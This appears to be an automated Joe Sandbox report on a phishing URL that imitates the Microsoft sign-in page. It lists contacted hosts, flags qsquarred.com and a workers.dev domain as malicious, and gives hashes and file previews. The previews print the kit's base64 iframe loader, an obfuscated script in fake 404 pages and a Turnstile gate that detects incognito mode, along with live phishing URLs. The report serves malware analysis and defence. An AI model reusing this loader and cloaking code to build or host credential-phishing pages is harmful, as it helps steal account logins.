                                            https://qsquarred.com/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3FzcXVhcnJlZC5jb20vIiwiZG9tYWluIjoicXNxdWFycmVkLmNvbSIsImtleSI6IkZZa0o4RjRUVHJrVCIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDkxNzcyLCJleHAiOjE3NDMwOTE4OTJ9.LzstCOvhrXFSFTQ5K2KWyFNPTbA0byj9xF5xo8K4D6Mfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://portal.microsoftonline.com/Prefetch/Prefetch.aspxfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              142.250.80.35
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              23.209.72.9
                                              e329293.dscd.akamaiedge.netUnited States
                                              20940AKAMAI-ASN1EUfalse
                                              1.1.1.1
                                              unknownAustralia
                                              13335CLOUDFLARENETUSfalse
                                              199.232.89.229
                                              jsdelivr.map.fastly.netUnited States
                                              54113FASTLYUSfalse
                                              104.18.94.41
                                              unknownUnited States
                                              13335CLOUDFLARENETUSfalse
                                              172.86.84.2
                                              qsquarred.comUnited States
                                              9009M247GBtrue
                                              104.18.95.41
                                              challenges.cloudflare.comUnited States
                                              13335CLOUDFLARENETUSfalse
                                              172.253.122.84
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              172.67.173.239
                                              248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devUnited States
                                              13335CLOUDFLARENETUStrue
                                              23.44.201.172
                                              a1894.dscb.akamai.netUnited States
                                              20940AKAMAI-ASN1EUfalse
                                              142.251.40.195
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              104.21.30.213
                                              unknownUnited States
                                              13335CLOUDFLARENETUSfalse
                                              142.250.72.100
                                              www.google.comUnited States
                                              15169GOOGLEUSfalse
                                              13.107.9.156
                                              b-0004.b-dc-msedge.netUnited States
                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              20.190.190.130
                                              unknownUnited States
                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              142.250.65.202
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              142.251.35.174
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              IP
                                              192.168.2.16
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1650392
                                              Start date and time:2025-03-27 17:08:31 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                              Sample URL:https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • EGA enabled
                                              Analysis Mode:stream
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal60.phis.win@26/16@24/182
                                              • Exclude process from analysis (whitelisted): svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 142.250.80.35, 142.251.35.174, 172.253.122.84, 142.250.81.238
                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                              Category:downloaded
                                              Size (bytes):829
                                              Entropy (8bit):5.708933285874252
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:37BB8C2AA86276EBF216336A308F7B7F
                                              SHA1:DCC599521B915DB3FFAEEAB4D2FCA2AABEC754DD
                                              SHA-256:396336F9F70F75B5645D232BBB36910CDF4FCAA04F1454051B48CCA92FD6474B
                                              SHA-512:66703CCFCC56DF475043C1FB8EC9ABBBA36DBF2F03BCA1D392C46B509E303ACF87A09B30E3E0C03D2A0845CA41B191DB2199A00EEAC5A2577CEE08FFD3E4D495
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js
                                              Preview:<!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX0pKTtkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuc3R5bGUuZmlsdGVyPSJodWUtcm90YXRlKDRkZWcpIjtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImciXX0pKTtzZXRUaW1lb3V0KGMsMWUzKX19YygpOwo="></script><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : d5199a57-b01e-0000-7b32-9fca2c000000</li><li>TimeStamp : 2025-03-27T16:05:32.9915322Z</li></ul></p></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (802), with no line terminators
                                              Category:downloaded
                                              Size (bytes):802
                                              Entropy (8bit):5.830283770247898
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:04A07F43E2B1D094C17023D66099A85F
                                              SHA1:2CCDF89BCBD6A78F7162269A40BE661D34E506C5
                                              SHA-256:D5B8C13E535708C6229F08EC39B3A4997AB27823B42339342756025BAF935B0A
                                              SHA-512:88B9A9027BC15D6EF48C4B963666D33D1A7B2A3214F5F30A711E065CC65919D4B0D3C608ACF23526FB3B1281571533F60E87BC6024E7AFB2D2205C47CF42EDE4
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
                                              Preview:<!doctype html><html><head><meta charset="utf-8"></head><body><script>document.write(atob("PCFkb2N0eXBlIGh0bWw+PGh0bWw+PGhlYWQ+PG1ldGEgY2hhcnNldD0idXRmLTgiPjxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSI+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46MDtwYWRkaW5nOjAiPjxpZnJhbWUgc3JjPSJodHRwczovL3FzcXVhcnJlZC5jb20vP3NpZ249ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SjFjbXdpT2lKb2RIUndjem92TDNGemNYVmhjbkpsWkM1amIyMHZJaXdpWkc5dFlXbHVJam9pY1hOeGRXRnljbVZrTG1OdmJTSXNJbXRsZVNJNklrWlphMG80UmpSVVZISnJWQ0lzSW5KbFppSTZiblZzYkN3aWFXRjBJam94TnpRek1Ea3hOemN5TENKbGVIQWlPakUzTkRNd09URTRPVEo5Lkx6c3RDT3ZoclhGU0ZUUTVLMktXeUZOUFRiQTBieWo5eEY1eG84SzRENk0iIHN0eWxlPSJ3aWR0aDoxMDAlO2hlaWdodDoxMDB2aDtib3JkZXI6bm9uZTsiPjwvaWZyYW1lPjwvYm9keT48L2h0bWw+"));</script></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 76 x 3, 8-bit/color RGB, non-interlaced
                                              Category:downloaded
                                              Size (bytes):61
                                              Entropy (8bit):4.068159130770307
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:DE4A93912D7E830CF773CEEBE29BCBAB
                                              SHA1:2F2AFA3AC11DF2A2835E2F2263484651E7968725
                                              SHA-256:88B8F389497FE3F2E35E78E018FD22302766552470A21D9CA178C35E547E58FF
                                              SHA-512:0752A485B2B608148E1922AAAFB6642A0D79B0D32CA62CE30233175BF423CA3747C13B4A128557E43485E4F0E8CD5BBAEF8225F1462C0AB1D82B41630F2731FE
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9270269dc843c451/1743091753670/NCiEr2lNZQ8amFY
                                              Preview:.PNG........IHDR...L...........~.....IDAT.....$.....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                              Category:downloaded
                                              Size (bytes):829
                                              Entropy (8bit):5.717153867090583
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:07D32845F1D615EF23D7399515C828E5
                                              SHA1:35031CF5A99C1D2663F710F55DABDA05B43F406C
                                              SHA-256:01997F0B662CCCAAF1319BDDDE6A8CF54E2A61DDC6E137DDA73587B7554F718A
                                              SHA-512:19DCC5D98DA4A92F5379A7722500132007BCCFE3E00016625FCB171102B1EFFEAA8B4EC6591FC5129C19B516DB9D7FAE0C20E620A424F0905ABEDA98C1278B9D
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js
                                              Preview:<!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX0pKTtkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuc3R5bGUuZmlsdGVyPSJodWUtcm90YXRlKDRkZWcpIjtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImciXX0pKTtzZXRUaW1lb3V0KGMsMWUzKX19YygpOwo="></script><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : 40d993a1-c01e-0001-7f32-9fdebb000000</li><li>TimeStamp : 2025-03-27T16:05:31.0840437Z</li></ul></p></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):3651
                                              Entropy (8bit):4.094801914706141
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                              SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                              SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                              SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text
                                              Category:dropped
                                              Size (bytes):2369
                                              Entropy (8bit):4.670127273213969
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:2425C1425212CAC1B766FD7DC97CB3DF
                                              SHA1:B9AB4FFC52F5C25508E1BB1C58291BAA549013C1
                                              SHA-256:7266AD475843798CE7C9F9835589AD86A16F3D08B73835B8D848211C86757188
                                              SHA-512:E9AB4D88F8732CEC5BF79D50F0D9CAFC369E99A0BB180EA9F42C08D0B4F990F5CD0CD3126000AAF7D73FB37B941A4A9539F4EF9DAD9FC026DA32F61652A55720
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:<!doctype html>.<html lang="en-US">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title>One more step before you proceed...</title>. <script src="https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js"></script>. <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script>. <script>. let isPrivateMode = false;.. // Check only for Chrome incognito. detectIncognito().then((result) => {. isPrivateMode = (result.browserName === 'Chrome' && result.isPrivate);. console.log('Is Chrome Incognito:', isPrivateMode);. });.. var verifyCallback_CF = function(response) {. if (response && response.length > 10) {. var cfForm = document.querySelector("#cfForm");. cfForm.querySelector('input[name="chromeIncognito"]').value = isPrivateMode ?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                              Category:downloaded
                                              Size (bytes):829
                                              Entropy (8bit):5.7345548669067
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:D6131A501EE6D119ED6A894DF52AF5DC
                                              SHA1:3F7754B24923550C7FE166444187F195EDE4C02B
                                              SHA-256:CB45913FB815279C665C947B82DD5B24F2DD529FE4737888DED70F835205AC9F
                                              SHA-512:1C91FEFAA5FEB6E8EC6DB096B6D0B7EDC0ED1484190D4A2BCC64E8A595DB9136D2E255B38A86F970D46502E9C704EE42D8242232765513814E5BBC7EDC58DC59
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                              Preview:<!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX0pKTtkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuc3R5bGUuZmlsdGVyPSJodWUtcm90YXRlKDRkZWcpIjtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImciXX0pKTtzZXRUaW1lb3V0KGMsMWUzKX19YygpOwo="></script><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : e0c88c1f-801e-0088-0f32-9fb1c7000000</li><li>TimeStamp : 2025-03-27T16:09:36.7750320Z</li></ul></p></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):689016
                                              Entropy (8bit):4.210696031972732
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:3B72E939A304CE05F0CEAB4A0AC39DD9
                                              SHA1:B2CFD3CB1BD0EE53C795E040063D0F55F544D939
                                              SHA-256:CC58721894324D6F6F53B7FE4CB0D08F923AA75E52506C0A58D29E4390B7CEDD
                                              SHA-512:F4AF43BA51B76496C98A30F06D9903440C4957E18F82B09D2B9C706CAD5939446D8BAA4353FD0620A2F68CEA79878824CD2313594997F0F8403C13FF767E6112
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js
                                              Preview:!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3937)
                                              Category:downloaded
                                              Size (bytes):5270
                                              Entropy (8bit):5.474400542516616
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:7B30772ECC161EDE21216D4430829ACB
                                              SHA1:1323174C192B1E970C4D8AD2D0E95032364C09C6
                                              SHA-256:4CABA20287EBAA975B3F24090C94A9CAEA10C880B692AC654456900D23996757
                                              SHA-512:8BC650C655F67F2D9F56503F3E45051F066C03C51ED8F46DF018D2DA9F0B87734199DE51E1A3366D71DBD6823E64B71F75F81BDA62D3282B79A4D3234E5B2FDF
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js
                                              Preview:/*!. *. * detectIncognito v1.3.7. *. * https://github.com/Joe12387/detectIncognito. *. * MIT License. *. * Copyright (c) 2021 - 2025 Joe Rutkowski <Joe@dreggle.com>. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in all. * copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. * AUTHOR
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (32209)
                                              Category:downloaded
                                              Size (bytes):58645
                                              Entropy (8bit):5.369827766734305
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:AF54A0E6CC4B28B24939ADB68552B4E2
                                              SHA1:B68E6AB4E26172814A836079305EC9AF8257D0E1
                                              SHA-256:7596A378126999C31D87AA95072F6068D3CC587F05A4088015079EEDF73678A6
                                              SHA-512:7B75B9E49543F0C4ED57BC57DF9ED02473866CD7D38EC77762A3C68C1AEE205969F27DDB262ED24F137625719AACB86176B2C9BB3E263CF5361B6735D4E160FC
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_r1sg5sxlkljjoa22hvk04g2.js
                                              Preview:!function(e){function o(n){if(i[n])return i[n].exports;var r=i[n]={exports:{},id:n,loaded:!1};return e[n].call(r.exports,r,r.exports,o),r.loaded=!0,r.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),r=i(5),t=i(6),a=t.StringsVariantId,s=t.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=r.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (61177)
                                              Category:downloaded
                                              Size (bytes):113424
                                              Entropy (8bit):5.2850742719795925
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:F3588C5412D4119F95E47073A4A5DF72
                                              SHA1:3C4B1652E71C25E1CE7DE611FBD17EDBAAE411D9
                                              SHA-256:6CC79C59F00478CE5D8EAA982EFDD8FC3CC205A7EA023A564BB2688FA206A087
                                              SHA-512:62886F8BFB32D2BE842A23ECA157556C30EC1D616E2607D9DF1894F702BB7A982EEB3576C95F859B4B8E9183A84D70149A8802F31317F80D4845B02CCFA018F9
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                              Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (48122)
                                              Category:downloaded
                                              Size (bytes):48123
                                              Entropy (8bit):5.342998089666478
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:EA38BDA3C117E2FE01BD862003357394
                                              SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                              SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                              SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                              Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):56
                                              Entropy (8bit):4.860577243331642
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:F220004BD2C441EC576F73CBEA83D539
                                              SHA1:127484ECE51FCB705C8FA91681CBE71AFBC06876
                                              SHA-256:F4014D5129917EE668E2AF3A51054CBF8C6B92DC35741328C643E6CE21B102D3
                                              SHA-512:5526E094B6DC023E7733B8A77A020BD52BB2D1342DAC93DEB473714E34734F2FB93824403518702DE53F02CDCD201A5B81CCA6FDFCE731D7921A1824A8062AE5
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCdM1pSi2JEkSEgUN0VtRUhIFDVd69_0hp18Ti6IuqkwSIAnw9fS3KICc9hIFDdFbUVISBQ1Xevf9IadfE4uiLqpM?alt=proto
                                              Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgAKEgoHDdFbUVIaAAoHDVd69/0aAA==
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):61
                                              Entropy (8bit):3.990210155325004
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):28
                                              Entropy (8bit):4.307354922057605
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                              SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                              SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                              SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCfD19LcogJz2EgUN0VtRUhIFDVd69_0hzqteam2WCJo=?alt=proto
                                              Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):1864
                                              Entropy (8bit):5.222032823730197
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
